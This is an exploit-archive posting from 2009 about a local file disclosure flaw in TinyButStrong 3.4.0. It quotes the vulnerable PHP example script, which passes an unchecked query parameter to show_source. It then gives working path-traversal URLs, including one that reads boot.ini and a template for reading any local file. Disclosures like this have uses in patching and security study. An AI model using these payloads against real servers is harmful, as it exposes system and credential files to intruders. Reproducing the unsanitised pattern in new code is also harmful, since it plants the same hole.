[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : TinyButStrong 3.4.0 (script) Local File Disclosure Vulnerability
# Published : 2009-05-13
# Author : ahmadbady
# Previous Title : MRCGIGUY Top Sites 1.0.0 Insecure Cookie Handling Vuln
# Next Title : Password Protector SD 1.3.1 Insecure Cookie Handling Vulnerability


(  ' )-.          ,~'`-.
                                       ,~' `  ' ) )       _(   _) )
                                      ( ( .--.===.--.    (  `    ' )
                                       `.%%.      .#`.   `-'`~~=~'
                                       /%%/         ##
                                      |%%/  local    ##|
                                      |%%|           |##|.,-.
                                      %%|  file     |##/    )_
                                       %           /#/ ( `'  )
                                        % include /#/(  ,  -'`-.
                                    ,~-. `%       /#'(  (     ') )
                                   (  ) )_ `__|__/'   `~-~=--~~='
                                  ( ` ')  ) [-=-=-]
                                 (_(_.~~~'   |_|/ 
                                             [***]
                              |||/
                              (o o) 
-=-=-=-==-=-=-=-=-=-=-=+-oooO--(_)-------+-=-=-=-=-=-=-   
                       |                 |    
                       |                 |                                      

script:TinyButStrong version 3.4.0
-------------------------------------------------
Author: ahmadbady 
email: kivi_hacker666@yahoo.com
my site:Coming Soon
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-====-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
download from:http://www.tinybutstrong.com/download/download.php?file=tbs_us.zip&sid=2

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=--=-=--=
vul:/examples/tbs_us_examples_0view.php

<?php
if (!isset($_GET)) $_GET=&$HTTP_GET_VARS ;
show_source('tbs_us_examples_'.$_GET['script']) ;
exit ;
?>

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-
xpl:

path/examples/tbs_us_examples_0view.php?script=../../../../boot.ini

path/examples/tbs_us_examples_0view.php?script=[local_file]
-=-=-=-=-=-=-=-=-=-=-=-+------------Ooo--+-=-=-=-=-=-=-=-=-=-=-=-=-        
                            |__|__|
                             || ||
                             OoO OoO

# www.Syue.com [2009-05-13]